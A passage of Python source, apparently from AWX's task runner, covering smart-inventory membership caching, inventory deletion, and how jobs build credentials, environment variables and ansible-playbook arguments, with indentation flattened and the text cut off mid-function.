def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
self.recent_event_timings = deque(maxlen=settings.MAX_WEBSOCKET_EVENT_RATE)
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"process_isolation_executable": "podman", # need to provide, runner enforces default via argparse
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
verify_ssl = cred.get_input('verify_ssl')
params['container_auth_data'] = {'host': host, 'username': username, 'password': password, 'verify_ssl': verify_ssl}
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
                # Using z allows the dir to be mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
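                # e.g. an AWX_ISOLATION_SHOW_PATHS entry of '/opt/data' (illustrative path)
                # becomes the podman mount spec '/opt/data:/opt/data:z'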
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
path = tempfile.mkdtemp(prefix=JOB_FOLDER_PREFIX % instance.pk, dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(path)
        # Ansible runner requires that the project directory exists, and we will write files
        # into the other folders below without creating them first, so pre-create all of them here.
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
        Returns a dictionary of the form:
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
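        # host_map is keyed by inventory hostname, e.g. {'web1.example.com': 42} (illustrative
        # values); event_handler later uses it to attach host_id to emitted events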
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
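            # e.g. a local timeout of 0 falls back to the global setting, and a negative
            # local timeout disables the timeout entirely (job_timeout becomes 0)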
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
# To prevent overwhelming the broadcast queue, skip some websocket messages
if self.recent_event_timings:
cpu_time = time.time()
first_window_time = self.recent_event_timings[0]
last_window_time = self.recent_event_timings[-1]
if event_data.get('event') in MINIMAL_EVENTS:
should_emit = True # always send some types like playbook_on_stats
elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
should_emit = False # exclude events with no output
else:
should_emit = any(
[
                        # if the 30th most recent websocket message was sent over 1 second ago
cpu_time - first_window_time > 1.0,
# if the very last websocket message came in over 1/30 seconds ago
self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
# if the queue is not yet full
len(self.recent_event_timings) != self.recent_event_timings.maxlen,
]
)
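                # summarizing the checks above (assuming a window of 30, per the comments):
                # emit when the oldest of the last 30 messages is over 1s old, when the newest
                # is over 1/30s old, or when fewer than 30 messages have been sent so far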
if should_emit:
self.recent_event_timings.append(cpu_time)
else:
event_data.setdefault('event_data', {})
event_data['skip_websocket_message'] = True
elif self.recent_event_timings.maxlen:
self.recent_event_timings.append(time.time())
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
                logger.warning('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
        # keep a reference on self.instance because of the update_model pattern and because it is used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
res = receptor_job.run()
self.unit_id = receptor_job.unit_id
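                # non-system jobs are dispatched through Receptor; only SystemJob runs
                # ansible-runner directly in this process (see the branch above)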
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
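                # e.g. a vault credential with vault_id 'dev' (illustrative) produces the
                # password key 'vault_password.dev'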
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
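            # e.g. for collections this might end up as
            # '<CONTAINER_ROOT>/requirements_collections:~/.ansible/collections:/usr/share/ansible/collections'
            # (illustrative; the in-container folder is prepended ahead of any env/config paths and the defaults)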
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
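                    # e.g. the key 'vault_password.dev' (illustrative) yields
                    # ['--vault-id', 'dev@prompt'], while the plain 'vault_password' key
                    # maps to --ask-vault-pass above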
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
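                # e.g. job.forks=500 with MAX_FORKS=200 (illustrative values) is clamped
                # to '--forks=200'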
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
        # higher levels of privilege - those that have the ability to create and
        # edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
